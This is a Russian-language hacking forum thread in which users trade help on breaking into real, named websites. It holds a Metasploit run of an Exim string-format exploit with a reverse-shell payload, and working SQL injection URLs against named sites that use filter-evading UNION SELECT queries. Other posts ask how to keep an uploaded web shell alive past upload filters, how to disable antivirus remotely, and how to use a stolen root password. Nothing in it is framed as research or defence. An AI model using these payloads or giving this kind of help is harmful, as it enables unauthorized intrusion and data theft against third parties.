Столкнулся со следующей проблемой. На сайте крутится Exim 4.69. Вывод nmap: 25/tcp open smtp Exim smtpd 4.69 Пытаюсь использовать готовый эксплойт в Metsploit - http://www.metasploit.com/modules/exploit/unix/smtp/exim4_string_format Вывод консоли: msf > use unix/smtp/exim4_string_format msf exploit(exim4_string_format) > set LHOST xxx LHOST => xxx msf exploit(exim4_string_format) > set RHOST yyy RHOST => yyy msf exploit(exim4_string_format) > set Payload generic/shell_reverse_tcp Payload => generic/shell_reverse_tcp msf exploit(exim4_string_format) > exploit [-] Handler failed to bind to xxx:4444 [*] Started reverse handler on 0.0.0.0:4444 [*] Server: yyy ESMTP Exim 4.69 #1 Sun, 12 Dec 2010 11:00:32 -0600 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail. [*] EHLO: yyy Hello xxx [xxx] [*] EHLO: 250-SIZE 52428800 [*] EHLO: 250-PIPELINING [*] EHLO: 250-AUTH PLAIN LOGIN [*] EHLO: 250-STARTTLS [*] EHLO: 250 HELP [*] Determined our hostname is xxx and IP address is xxx [*] MAIL: 250 OK [*] RCPT: 550-xxx (xxx) [xxx] is currently 550-not permitted to relay through this server. Perhaps you have not logged 550-into the pop/imap server in the last 30 minutes or do not have SMTP 550 Authentication turned on in your email client. [*] DATA: 503-All RCPT commands were rejected with this error: 503-xxx (xxx.com) [xxx] is currently 503-not permitted to relay through this server. Perhaps you have not logged 503-into the pop/imap server in the last 30 minutes or do not have SMTP 503-Authentication turned on in your email client. 503 Valid RCPT command must precede DATA [*] Constructing initial headers ... [*] Constructing HeaderX ... [*] Constructing body ... [*] Sending 50 megabytes of data... [-] Exploit exception: Broken pipe [*] Exploit completed, but no session was created. Что это за Broken pipe такой? Кто-нибудь вообще пробовал этот сплойт? На другом сервере выдает: [*] MAIL: 250 OK [*] RCPT: 550-"JunkMail rejected - xxx (xxx.com) 550-[xxx]:50524 is in an RBL, see 550 http://www.spamhaus.org/query/bl?ip=xxx" [-] Exploit exception: end of file reached [*] Exploit completed, but no session was created. Тут я тоже ничего не понимю
http://www.alienzero.com/agent/resulttype.asp?probe=' Как ваще это крутить? Нашел по этой уязвимости http://1337db.com/exploits/15056 Подскажите плз.
Если верить вики, то Джет - это то же, что и Access, по идее так же должно и крутиться. Мб стоит попробовать по этой статейке: https://forum.antichat.ru/showthread.php?p=2193060 ? З.Ы. Самому интересно.
Не выводяться таблицы! http://www.copelandfurniture.com/subcategory.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,4,5,table_name,7,8,9+from+information_schema.tables+--+
http://www.copelandfurniture.com/subcategory.php?id=-1+/*!union*/+select+1,2,3,4,5,/*!table_name*/,7,8,9+from+information_schema.tables+limit+0,1+--+
http://www.copelandfurniture.com/subcategory.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,4,5,/*!unhex%28hex%28table_name%29%29*/,7,8,9+from+information_schema.tables+--+ часто вижу как ты выкладываешь сюда скули недокрученные, а подумать чуток? вот тебе таблы, без лимита все сразу
Помогите, нашел уязвимость на сайте, залил shell, все отлично, прошло 8 дней и тут его запилили, точнее он остался, но при его вызове этот скрипт переходит в скачку, словно простой файл. Штакетник залить не дает, файлы других форматов спокойно открывает(тестил html), вот вопрос, как это обойти и есть ли шелы других форматов(html, shtml, asp)?
Попробовал, не помогает, все равно срубает, он просто расширение любое переводи в php и срубает, например если залить 1.phtml, на сервере он будет лежать как "1." и если переписать php, начинает скачивать....Какие еще есть варианты?
Чото не крутится, или кручу криво. Короче хелп плиз, а то у меня есть Н таких сайтов (из Гугла), было бы отлично раскрутить. Буду весьма благодарен.
Каким образом можно отключить службу OpenService на Windows? Из-за нее не могу отключить службы антивирей на удаленном компе.
http://shop.guidesqld.org/store/showCart.shop post параметр idProduct=1082' посмотрите кто ни буль есть ли уязвимость
Есть root пароль на сервак a1tv.ru там открыто всего 2 порта 80 и 443 не могу зацепиться,как попасть туда.
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '&'. /includes/databaseFunctions.shop, line 31 по-моему кроме сообщение об ошибке, больше ничего полезного не вывести